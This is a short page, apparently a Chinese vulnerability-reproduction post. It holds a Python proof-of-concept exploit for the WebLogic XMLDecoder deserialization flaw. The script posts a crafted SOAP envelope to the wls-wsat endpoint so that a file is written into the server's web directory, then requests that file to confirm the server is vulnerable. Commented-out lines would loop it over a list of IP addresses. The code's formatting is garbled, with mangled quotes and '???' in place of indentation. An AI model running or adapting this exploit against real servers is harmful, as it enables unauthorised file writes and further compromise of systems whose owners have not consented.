WebLogic XMLDecoder反序列化漏洞复现

import requestsheaders = { ‘Content-type‘: ‘text/xml‘ }data = ‘‘‘<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> ???????????<soapenv:Header> ???????????????<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> ???????????????????<java><java version="1.4.0" class="java.beans.XMLDecoder"> ???????????????????????<object class="java.io.PrintWriter"> ???????????????????????????<string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/weblogic.txt</string> ???????????????????????????<void method="println"><string>Weblogic_Test</string></void><void method="close"/> ???????????????????????</object> ???????????????????</java></java> ???????????????</work:WorkContext> ???????????</soapenv:Header> ???????????<soapenv:Body/> ???????</soapenv:Envelope>‘‘‘def exp(ip): ???# ip = ip.strip("\n") ???url_post = ip + "/wls-wsat/CoordinatorPortType11" ???url_myfile = ip + "/bea_wls_internal/weblogic.txt" ???# print("Test for " + ip + ".....") ???r = requests.post(url=url_post,data=data,headers=headers) ???r2 = requests.get(url_myfile) ???if r2.status_code != 404: ???????print("Weblogic Vulnerable!!!") ???????print("You file path is " + url_myfile) ???else: ???????print("No Vulnerable!!!") ???# print("=================================================")if __name__ == ‘__main__‘: ???# Weblogic_IP_list = [] ???# with open("weblogic.txt") as f: ???# ????Weblogic_IP_list = f.readlines() ???# for ip in Weblogic_IP_list: ???# ????exp(ip) ???ip = "http://192.168.126.142:7001" ???exp(ip)